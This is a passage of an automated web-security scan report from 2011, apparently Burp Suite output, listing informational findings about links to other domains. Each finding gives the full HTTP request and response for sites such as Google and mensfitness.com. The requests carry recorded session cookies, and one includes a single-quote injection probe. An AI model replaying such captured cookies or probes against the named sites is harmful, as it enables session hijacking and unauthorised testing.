GET /url?sa=t&source=web&cd=8&ved=0CE0QFjAH&url=http%3A%2F%2Fwww.threatexpert.com%2Freport.aspx%3Fmd5%3D57eb54a5e3fe2c152c3e438277376933&ei=JYZJTdvwDsKBgAe-79TsDw&usg=AFQjCNGsGlQtzjaMQGwZ73n9GL-pHTs9Yw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; SSDATA-DOMAIN=ikjREw(0:; TZ=360; GZ=Z=0; S=sorry=6N0zPerLQtaqcOPwyzNvWg; GDSESS=ID=3835842a4a693afb:EX=1296674886:S=ADSvE-emQw1lIo2YoqCOpGtBmC8AL8VPeQ; NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7

Response

HTTP/1.1 302 Found
Location: http://www.threatexpert.com/report.aspx?md5=57eb54a5e3fe2c152c3e438277376933
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:28:54 GMT
Server: gws
Content-Length: 273
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.threatexpert.com/report.aspx?md5=57eb54a5e3fe2c152c3e438277376933">here</A>
...[SNIP]...

17.286. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?url=http://www.youtube.com/watch%3Fv%3D&rct=j&sa=X&ei=4AT0T

The response contains the following link to another domain:

http://www.youtube.com/watch?v=

Request

GET /url?url=http://www.youtube.com/watch%3Fv%3D&rct=j&sa=X&ei=4AT0T HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:46:51 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<body><a href="http://www.youtube.com/watch?v=" id=link target=_parent></body><script>var a=parent,b=parent.google,c=location;if(a!=window&&b){if(b.r){b.r=0;document.getElementById("link").click();}}e
...[SNIP]...

17.287. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBUQFjAA&url=http%3A%2F%2Fwww.robtex.com%2Fdns%2Fstatic.2mdn.net.html&ei=JYZJTdvwDsKBgAe-79TsDw&usg=AFQjCNHu4Kc1lOGjmGy7hGObIrQk4YA0hA

The response contains the following link to another domain:

http://www.robtex.com/dns/static.2mdn.net.html

Request

GET /url?sa=t&source=web&cd=1&ved=0CBUQFjAA&url=http%3A%2F%2Fwww.robtex.com%2Fdns%2Fstatic.2mdn.net.html&ei=JYZJTdvwDsKBgAe-79TsDw&usg=AFQjCNHu4Kc1lOGjmGy7hGObIrQk4YA0hA HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; SSDATA-DOMAIN=ikjREw(0:; TZ=360; GZ=Z=0; S=sorry=6N0zPerLQtaqcOPwyzNvWg; GDSESS=ID=3835842a4a693afb:EX=1296674886:S=ADSvE-emQw1lIo2YoqCOpGtBmC8AL8VPeQ; NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7

Response

HTTP/1.1 302 Found
Location: http://www.robtex.com/dns/static.2mdn.net.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:28:51 GMT
Server: gws
Content-Length: 243
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.robtex.com/dns/static.2mdn.net.html">here</A>
...[SNIP]...

17.288. http://www.google.com/webhp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/webhp

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/webhp?hl=en

The response contains the following link to another domain:

http://www.youtube.com/?hl=en&tab=w1

Request

GET /webhp?hl=en HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:51:34 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: __utmz=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=www.google.com
Set-Cookie: __utma=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=www.google.com
Set-Cookie: __utmz=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=.www.google.com
Set-Cookie: __utma=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=.www.google.com
Set-Cookie: __utmz=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=google.com
Set-Cookie: __utma=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=google.com
Set-Cookie: __utmz=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=.google.com
Set-Cookie: __utma=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=.google.com
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google</title><script>window.google={kEI:"hn1JTaLJC4yieqC-yNYC",kEXPI:"17259,17291,27615,27683,2818
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

17.289. http://www.invisionpower.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.invisionpower.com
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.invisionpower.com/index.php?79b73'

The response contains the following link to another domain:

http://server.iad.liveperson.net/hc/36704500/x.js?cmd=file&file=chatScript3&site=36704500&&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a

Request

GET /index.php?79b73' HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:47:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Cache-Control: no-cache, must-revalidate, max-age=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Invision Power Services :: 404 File Not Found</ti
...[SNIP]...
<script language='javascript' src='http://server.iad.liveperson.net/hc/36704500/x.js?cmd=file&file=chatScript3&site=36704500&&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a'> </script>
...[SNIP]...

17.290. http://www.kampyle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kampyle.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.kampyle.com/?r=3

The response contains the following links to other domains:

http://www.verisign.com/ssl-certificate/
https://seal.verisign.com/getseal?host_name=www.kampyle.com&size=S&use_flash=NO&use_transparent=NO&lang=en
https://server.iad.liveperson.net/hc/87252509/?cmd=mTagRepstate&site=87252509&buttonID=13&divID=lpButDivID-1295126343775&bt=3&c=1
https://www.beyondsecurity.com/verification-images/www.kampyle.com/vulnerability-scanner-8.gif
https://www.beyondsecurity.com/vulnerability-scanner-verification/www.kampyle.com

Request

GET /?r=3 HTTP/1.1
Host: www.kampyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:30:27 GMT
Server: Apache
Set-Cookie: PHPSESSID=cac102eb5cda270b51a2b196a150888d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html>
<head>
<link href="/min/?f=%2Fstatic%2Fcss%2Fstyles.css.1296373190,%2Fstatic%2Fcss
...[SNIP]...
<td width="135" align="center" valign="top">
           <script src="https://seal.verisign.com/getseal?host_name=www.kampyle.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script><br />
           <a href="http://www.verisign.com/ssl-certificate/" target="_blank" style="color:#000000; text-decoration:none; font:bold 7px verdana,sans-serif; letter-spacing:.5px; text-align:center; margin:0px; padding:0px;">ABOUT SSL CERTIFICATES</a>
...[SNIP]...
<span class="seal" id="beyond_security_seal">
                   <a href="https://www.beyondsecurity.com/vulnerability-scanner-verification/www.kampyle.com" >
           <img src="https://www.beyondsecurity.com/verification-images/www.kampyle.com/vulnerability-scanner-8.gif" alt="Vulnerability Scanner" border="0" />
           </a>
...[SNIP]...

<script type="text/javascript" charset="UTF-8" src="https://server.iad.liveperson.net/hc/87252509/?cmd=mTagRepstate&site=87252509&buttonID=13&divID=lpButDivID-1295126343775&bt=3&c=1"></script>
...[SNIP]...

17.291. http://www.ligattsecurity.com/wp-content/plugins/wp-prettyphoto/js/jquery.prettyPhoto.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ligattsecurity.com
Path:	/wp-content/plugins/wp-prettyphoto/js/jquery.prettyPhoto.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.ligattsecurity.com/wp-content/plugins/wp-prettyphoto/js/jquery.prettyPhoto.js?ver=2.5.6

The response contains the following link to another domain:

http://www.apple.com/qtactivex/qtplugin.cab

Request

GET /wp-content/plugins/wp-prettyphoto/js/jquery.prettyPhoto.js?ver=2.5.6 HTTP/1.1
Host: www.ligattsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.ligattsecurity.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1296574377227827; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:33:02 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Sat, 14 Aug 2010 02:41:03 GMT
ETag: "7b4573-41d3-48dbf87c5cdc0"
Accept-Ranges: bytes
Content-Length: 16851
Connection: close
Content-Type: application/x-javascript

/* ------------------------------------------------------------------------
*    Class: prettyPhoto
*    Use: Lightbox clone for jQuery
*    Author: Stephane Caron (http://www.no-margin-for-errors.com)

...[SNIP]...
</object>',quicktime_markup:'<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" codebase="http://www.apple.com/qtactivex/qtplugin.cab" height="{height}" width="{width}"><param name="src" value="{path}">
...[SNIP]...

17.292. http://www.macromedia.com/shockwave/download/index.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.macromedia.com
Path:	/shockwave/download/index.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\

The response contains the following link to another domain:

http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash%5c

Request

GET /shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\ HTTP/1.1
Host: www.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 15:58:00 GMT
Server: Apache
Location: http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash%5c
Content-Length: 291
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash%5c">here</a>
...[SNIP]...

17.293. http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mensfitness.com
Path:	/Tshirt_Workout/fitness/ab_exercises/136

Issue detail

The page was loaded from a URL containing a query string:

http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136?cid=RSS

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=1020x200;tile=9;aid=136;ord=123456789?
http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=120x90;tile=6;aid=136;ord=123456789?
http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=120x90;tile=7;aid=136;ord=123456789?
http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=120x90;tile=8;aid=136;ord=123456789?
http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=160x600;tile=2;aid=136;ord=123456789?
http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=300x250,300x600;tile=4;aid=136;ord=123456789?
http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=300x250;tile=3;aid=136;ord=123456789?
http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=728x90;tile=1;aid=136;dcopt=ist;ord=123456789?
http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=728x90;tile=5;aid=136;ord=123456789?
http://ad.doubleclick.net/ad/ami.mf.home/;sz=300x90;tile=10;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=1020x200;tile=9;aid=136;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=120x90;tile=6;aid=136;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=120x90;tile=7;aid=136;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=120x90;tile=8;aid=136;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=160x600;tile=2;aid=136;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=300x250,300x600;tile=4;aid=136;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=300x250;tile=3;aid=136;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=728x90;tile=1;aid=136;dcopt=ist;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=728x90;tile=5;aid=136;ord=123456789?
http://ad.doubleclick.net/jump/ami.mf.home/;sz=300x90;tile=10;ord=123456789?
http://b.scorecardresearch.com/b?c1=2&c2=6036076&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1
http://digg.com/MensFitness
http://digg.com/users/MensFitness
http://edge.quantserve.com/quant.js
http://js.adsonar.com/js/adsonar.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pixel.quantserve.com/pixel/p-94wNw88f65Rhk.gif?labels=MTVN%20Digital%20Tribes
http://pixel.quantserve.com/pixel/p-b0iPm4Hn8ATss.gif
http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js
http://s7.addthis.com/js/250/addthis_widget.js
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-mensfitness&cg=0&cc=1
http://secure-us.imrworldwide.com/v53.js
http://twitter.com/mens_fitness
http://www.americanmediainc.com/
http://www.americanmediainc.com/brand/mens-fitness
http://www.askmen.com/top_10/sports/top-10-all-time-nfl-defenses.html
http://www.countryweekly.com/
http://www.facebook.com/mensfitness
http://www.fitpregnancy.com/
http://www.flexonline.com/
http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy
http://www.heavy.com/action/action-videos/action-video/2011/01/jack-lalanne-r-i-p/
http://www.maxim.com/amg/GIRLS/Girls+of+Maxim/Olivia+Munn+2011Cover
http://www.mmafacts.com/petition
http://www.muscleandfitness.com/
http://www.muscleandfitnesshers.com/
http://www.myspace.com/mens_fitness
http://www.nationalenquirer.com/
http://www.naturalhealthmag.com/
http://www.shape.com/
http://www.spike.com/tribes/
http://www.starmagazine.com/
http://www.stephenbailey.com/life/travel/the-first-woman-on-the-moon/
http://www.thesmokingjacket.com/girls/veronika-kotlajic-kicks-nerd-ass
https://w1.buysub.com/loc/MTS/ccare
https://w1.buysub.com/loc/MTS/footer
https://w1.buysub.com/loc/MTS/gift
https://w1.buysub.com/loc/MTS/renew
https://w1.buysub.com/loc/MTS/subscribe

Request

GET /Tshirt_Workout/fitness/ab_exercises/136?cid=RSS HTTP/1.1
Host: www.mensfitness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:33:33 GMT
Server: Apache/2.2.3 (Red Hat)
Age: 0
Cache-Control: max-age=20401
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 01 Feb 2011 20:13:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44899
Via: 1.1 mdw107103 (MII-APC/1.6)
Connection: close

<html>
<head>

<title>The T-Shirt Body Workout - Men's Fitness</title>

<meta name="Description" content="Fill out your favorite tee with our exclusive eight-week program for bigger shoulders, chest,
...[SNIP]...
</a> | <a href="http://www.facebook.com/mensfitness" target="_blank">facebook</a> | <a href="http://www.myspace.com/mens_fitness" target="_blank">myspace</a> | <a href="http://digg.com/users/MensFitness" target="_blank">digg</a> | <a href="http://twitter.com/mens_fitness" target="_blank">twitter</a>
...[SNIP]...
<li><a href="http://www.myspace.com/mens_fitness" target="_blank">MF on MySpace</a>
...[SNIP]...
<li><a href="http://www.facebook.com/mensfitness" target="_blank">MF on Facebook</a>
...[SNIP]...
<li><a href="http://digg.com/users/MensFitness" target="_blank">MF on Digg</a>
...[SNIP]...
<li><a href="http://twitter.com/mens_fitness" target="_blank">MF on Twitter</a>
...[SNIP]...
<div align="center" id="left_subscribe_links">
<a href="https://w1.buysub.com/loc/MTS/subscribe" target="_blank">Subscribe</a> | <a href="https://w1.buysub.com/loc/MTS/renew" target="_blank">Renew</a><br>
<a href="https://w1.buysub.com/loc/MTS/gift" target="_blank">Give a Gift</a> | <a href="https://w1.buysub.com/loc/MTS/ccare" target="_blank">Service</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=728x90;tile=1;aid=136;dcopt=ist;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=728x90;tile=1;aid=136;dcopt=ist;ord=123456789?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=1020x200;tile=9;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=1020x200;tile=9;aid=136;ord=123456789?" width="1020" height="200" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=160x600;tile=2;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=160x600;tile=2;aid=136;ord=123456789?" width="160" height="600" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=120x90;tile=6;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=120x90;tile=6;aid=136;ord=123456789?" width="120" height="90" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=120x90;tile=7;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=120x90;tile=7;aid=136;ord=123456789?" width="120" height="90" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=120x90;tile=8;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=120x90;tile=8;aid=136;ord=123456789?" width="120" height="90" border="0" alt=""></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mfer"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</a> <a href="http://twitter.com/mens_fitness" target="_blank" title="Twitter"><img src="/site/images/contact/contact-twitter-45.gif" alt="" width="45" height="45" border="0"></a> <a href="http://www.facebook.com/mensfitness" target="_blank" title="Facebook"><img src="/site/images/contact/contact-facebook-45.gif" alt="" width="45" height="45" border="0"></a> <a href="http://www.myspace.com/mens_fitness" target="_blank" title="MySpace"><img src="/site/images/contact/contact-myspace-45.gif" alt="" width="45" height="45" border="0"></a> <a href="http://digg.com/MensFitness" target="_blank" title="Digg"><img src="/site/images/contact/contact-digg-45.gif" alt="" width="45" height="45" border="0">
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=300x250;tile=3;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=300x250;tile=3;aid=136;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.home/;sz=300x90;tile=10;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.home/;sz=300x90;tile=10;ord=123456789?" width="300" height="90" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=300x250,300x600;tile=4;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=300x250,300x600;tile=4;aid=136;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<strong><a href="http://www.heavy.com/action/action-videos/action-video/2011/01/jack-lalanne-r-i-p/" target="_blank">Jack LaLanne R.I.P.</a>
...[SNIP]...
<strong><a href="http://www.thesmokingjacket.com/girls/veronika-kotlajic-kicks-nerd-ass" target="_blank">Veronika Kotlajic</a>
...[SNIP]...
<strong><a href="http://www.askmen.com/top_10/sports/top-10-all-time-nfl-defenses.html" target="_blank">Top 10 NFL Defenses</a>
...[SNIP]...
<strong><a href="http://www.stephenbailey.com/life/travel/the-first-woman-on-the-moon/" target="_blank">First Woman On The Moon</a>
...[SNIP]...
<strong><a href="http://www.maxim.com/amg/GIRLS/Girls+of+Maxim/Olivia+Munn+2011Cover" target="_blank">Olivia Munn</a>
...[SNIP]...
<strong><a href="http://www.mmafacts.com/petition" target="_blank">Bring UFC to NY</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=728x90;tile=5;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=728x90;tile=5;aid=136;ord=123456789?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</a> |
<a href="https://w1.buysub.com/loc/MTS/footer">Subscribe</a>
...[SNIP]...
</a> |
<a href="http://www.americanmediainc.com/brand/mens-fitness" target="_blank"> Advertising Information</a>
...[SNIP]...
<br>
© 2011 Weider Publications, LLC, a subsidiary of <a href="http://www.americanmediainc.com" target="_new">American Media, Inc.</a>
...[SNIP]...
<br>
Mensfitness.com is a member of the <a href="http://www.spike.com/tribes/" target="_blank">MTVN Tribes</a> anchored by MTVN properties like <a href="http://www.spike.com/tribes/" target="_blank">Spike</a>
...[SNIP]...
</strong> <a href="http://www.fitpregnancy.com" target="_blank">Fit Pregnancy</a> | <a href="http://www.flexonline.com" target="_blank">Flex</a>
...[SNIP]...
</a> | <a href="http://www.muscleandfitness.com" target="_blank">Muscle & Fitness</a> | <a href="http://www.muscleandfitnesshers.com" target="_blank">Muscle & Fitness Hers</a> | <a href="http://www.naturalhealthmag.com" target="_blank">Natural Health</a> | <a href="http://www.shape.com" target="_blank">Shape</a>
...[SNIP]...
</strong> <a href="http://www.countryweekly.com" target="_blank">Country Weekly</a> | <a href="http://www.nationalenquirer.com" target="_blank">National Enquirer</a> | <a href="http://www.starmagazine.com" target="_blank">Star</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-94wNw88f65Rhk.gif?labels=MTVN%20Digital%20Tribes" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-b0iPm4Hn8ATss.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...
<div><img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-mensfitness&cg=0&cc=1" alt="" style="display:none;"/></div>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6036076&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...

<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" SRC="http://kona.kontera.com/javascript/lib/KonaLibInline.js"></script>
...[SNIP]...

17.294. http://www.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
